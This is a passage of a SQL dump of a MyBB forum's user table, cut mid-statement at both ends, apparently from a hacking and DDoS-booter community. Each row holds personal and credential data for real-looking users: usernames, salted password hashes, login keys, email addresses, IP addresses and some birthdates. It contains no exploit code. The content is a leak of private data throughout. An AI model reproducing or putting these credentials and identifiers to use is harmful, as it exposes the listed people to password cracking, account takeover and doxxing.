'0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('63', 't3chie', 'bd698e6cf404916aee7576b2868e3b0b', 'MslRm8Lk', 'ctaKFnhbiPKkTmPxk9Kw8teL8pteWGayNPB9Ge3iMndMq1peVw', 'gobi20_1111@hotmail.com', '0', '', '', '', '14', '', '0', '', '1345102325', '1345102421', '1345102325', '0', '', '0', '', '', '', '', 'all', '', '0', '0', '0', '0', '0', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '174.91.133.199', '174.91.133.199', '-1369733689', '-1369733689', '', '96', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('64', 'vlajke', '02d8fde15011ab2c23c04b4d7cc0d796', 'eXbMiLeJ', 'iZM9e8zrkKLR2nbW3nxCHv4JexTUSehHUDUqeNa96cGMo3aLAi', 'cvejicvladimir@gmail.com', '5', '', '', '', '2', '', '0', '', '1345104218', '1345811920', '1345740751', '1345502587', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '5', '178.223.56.85', '93.87.231.108', '-1293993899', '1566041964', '', '5496', '1', '2', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '2', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('67', 'HoverCatz', '27c652ee40eed5add7db1f79ec665df8', 'TzHN2Arf', 'unCSBNzzg5MekdKIqOxpm2CpdDfSVMZMlVWzU58h8PYpCQQ8tO', 'kristoffergo1@hotmail.com', '118', './uploads/avatars/avatar_67.png?dateline=1345135078', '120|150', 'upload', '9', '12,20,21', '20', '6GB DDoS', '1345127387', '1352821070', '1352811135', '1352820667', 'http://ibooter.org', '0', '', '', '', '25-3-1984', 'age', '[img]https://dl.dropbox.com/u/33062220/newsig.png[/img]', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**$%%$5**Old Messages', '', '0', '2', '15', '85.165.36.95', '178.74.57.144', '1436886111', '-1303758448', '', '133743', '1', '111', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:8:{i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:2;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:3;a:2:{s:11:\"showprofile\";i:0;s:11:\"showpostbit\";i:0;}i:4;a:5:{s:4:\"acid\";i:4;s:4:\"name\";s:14:\"Fav mod donate\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_00_20.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:5;a:2:{s:11:\"showpostbit\";i:0;s:11:\"showprofile\";i:0;}i:6;a:1:{s:11:\"showprofile\";i:0;}i:7;a:1:{s:11:\"showprofile\";i:0;}}s:0:\"\";a:1:{s:0:\"\";a:2:{s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"apid\";a:3:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}i:1;a:1:{s:11:\"showprofile\";i:0;}i:2;a:1:{s:11:\"showprofile\";i:0;}}}', '9', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('71', 'Manchester', '1b9ac3ca779b0a0f0cd9115ca83c4d89', 'jKyf2DWL', 'DybSa3Nmj9UpjxYxybhIIk1BHfoUvzOaTKT9F9bNlo2KfE6E4B', 'Cooper6Shop@gmail.com', '0', '', '', '', '2', '', '0', '', '1345241059', '1345242792', '1345241540', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '0', '71.60.105.178', '71.60.105.178', '1195141554', '1195141554', '', '483', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('70', 'Oqud™', '9d26e541776f26fce33fe8db11ff339e', 'gFwcGDoA', 'J5LdzZMfS4ahuOvChvG3TWNqALuEaPJ9Jbx5Ifwj9NeB1vmsVt', 'hides@hotmail.com', '0', '', '', '', '2', '', '0', '', '1343932555', '1348018259', '1345220015', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '76.69.98.41', '72.231.24.165', '1279615529', '1223104677', '', '485', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('72', 'Quietus2', '6880c0c959742c90fc1afd55a2613180', 'dKHPbdU3', 'SMEZvPJ1dZMGREwCoqK1ntLrYV8nkjuSML8NkfMyHkjg4Psuvy', 'njulijus@gmail.com', '1', 'http://www.avatarsdb.com/avatars/destiny_anime.gif?dateline=1345048971?dateline=1345244324', '100|100', 'remote', '2', '', '0', '', '1345243175', '1345299535', '1345244456', '1345244215', '', '0', '', '', '', '', 'all', '[img]http://img233.imageshack.us/img233/821/2616.png[/img]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '0', '2', '54', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '78.58.52.147', '78.58.52.147', '1312437395', '1312437395', '', '1293', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('84', 'Thunder™', 'ac201dc16f6b61ce7c225e3fee01b7aa', 'rtfTVNDF', 'TXJCuCQh3LVnNoTmJdVTCyoargz9eGu9sKd6MhCnnGJC3luw4U', 'cscznoob@gmail.com', '28', '', '', '', '2', '', '0', '', '1345524754', '1352133647', '1352133646', '1352013443', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '5.5', '0', '2', '', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '13', '111.91.75.129', '111.91.95.12', '1868254081', '1868259084', '', '14582', '1', '3', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '9', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('87', 'Hostpro', '615ab47481eddeb1ffdacd7533c601e2', 'Y5L5rKuV', 'u8TbJSMpRtI1PcxAXIxtLzdDCbIOMFZxyFWgkvjIIFOymG7R5e', 'liamgordon1@live.com', '1', '', '', '', '10', '', '0', '', '1345577127', '1347284487', '1347284487', '1345631532', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '2', '0', '90.221.178.182', '90.204.128.185', '1524478646', '1523351737', '', '775', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('90', 'duhuh', '046bf6203eb79d6e115f86e7aeca9100', 'SKY2jM1T', 'FNHqJ86b7wjOSUeMX9bdTkOabxdbBrfuq4LbWWliZSIINhgq16', 'jackdh@hotmail.co.uk', '20', '', '', '', '2', '', '0', '', '1345594226', '1351214977', '1349216094', '1347214058', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '3', '216.172.135.73', '161.73.47.173', '-659781815', '-1589039187', '', '6422', '1', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '4', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('91', 'ßÏØ‡HÂŽÂRЙ', '563d0a7ae88fbfe268849411c7028d9c', 'I2Oolfv2', 'UgYhH6ePJvscrWzNxfzn5QgBKorY44pfpDaphV1ETjudg1WgRy', 'dbc.bio@aol.com', '0', '', '', '', '2', '', '0', '', '1345596642', '1345596642', '1345596642', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '10', '0', '0', '0', '', '', '', '82', '0', '0', '174.50.108.181', '', '-1372427083', '0', '', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('97', 'Spetsnaz', '8f78e1406e3906f3fb3a5720e241c0f2', 'wvDupsVf', 'nOuqyDfKkQBihQPathxiZLiccimZTIgKtkGGjKrYfRNUGPYHT5', 'TheSpetsnaz@Hotmail.com', '0', '', '', '', '2', '', '0', '', '1345640081', '1345640391', '1345640081', '0', '', '0', '', '', '', '', 'all', '', '1', '0', '2', '0', '1', '0', '1', '1', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-8', '1', '2', '', '', '10', '0', '0', '0', '', '', '', '0', '0', '0', '70.173.58.33', '70.173.58.33', '1185757729', '1185757729', '', '310', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('100', '??zg???g????61', '631b07a4b18f17eec830ac79bdb9788a', '8WXUJb7Z', 'kcU3OEhC5L4iuCGDERsCCpfBiGIKlXVmBfKsblmOe7D4ksuZEZ', 'gavmaster123@gmail.com', '176', './uploads/avatars/avatar_100.jpg?dateline=1349049880', '120|138', 'upload', '9', '20,13', '20', 'DDoS\'ing like a pro ;D', '1345677377', '1352807094', '1352762285', '1352517538', '', '0', '', '', '', '', 'all', '[align=center][url=http://l33thacking.net/thread-398.html][img]http://i.imgur.com/b6ooB.gif[/img][/url][/align] [align=center] [color=#87CEFA]PSN: [/color][color=#1E90FF]WHO_DAT_GYPSY[/color][/align] ', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '1', '2', '62', '', '10', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '15', '70.16.221.26', '70.192.22.124', '1175510298', '1186993788', '', '149362', '1', '49', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:3:{s:4:\"acid\";a:2:{i:16;a:5:{s:4:\"acid\";i:16;s:4:\"name\";s:10:\"Gold Brick\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/custom_21_10_12_12_19_48.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}i:27;a:5:{s:4:\"acid\";i:27;s:4:\"name\";s:5:\"Elite\";s:5:\"image\";s:58:\"inc/plugins/achivements/upload/custom_21_10_12_6_51_13.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:0;}}s:4:\"apid\";a:1:{i:3;a:5:{s:4:\"apid\";i:3;s:4:\"name\";s:13:\"Cheers on 100\";s:5:\"image\";s:57:\"inc/plugins/achivements/upload/posts_21_10_12_1_37_43.png\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '17', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('214', 'Rave™', 'ffb03f97ffd602f4a0c9f50d1c3eb3d0', 'Nnl2fTTH', 'zJXWFc16VGNykuYSBWRb3NRyzRkai686wccNpzGoXWRtaF3tX3', 'theogforums@gmail.com', '51', './uploads/avatars/avatar_214.png?dateline=1349659342', '87|150', 'upload', '14', '', '0', '', '1349220032', '1351375580', '1351293619', '1350937597', '', '0', '', '', '', '2-2-1980', 'all', '[align=center][img]http://i.imgur.com/90BIF.png[/img][/align]', '1', '0', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '0', '0', '-4', '0', '2', '', '', '0', '0', '0', '0', '', '1**$%%$2**$%%$3**$%%$4**', '', '0', '0', '3', '71.67.179.16', '71.72.242.232', '1195619088', '1195963112', '', '29456', '1', '2', '0', '50', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'a:1:{s:4:\"atid\";a:1:{i:2;a:5:{s:4:\"atid\";i:2;s:4:\"name\";s:10:\"10 Threads\";s:5:\"image\";s:59:\"inc/plugins/achivements/upload/threads_21_10_12_1_39_03.jpg\";s:11:\"showprofile\";i:1;s:11:\"showpostbit\";i:1;}}}', '34', '0'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, 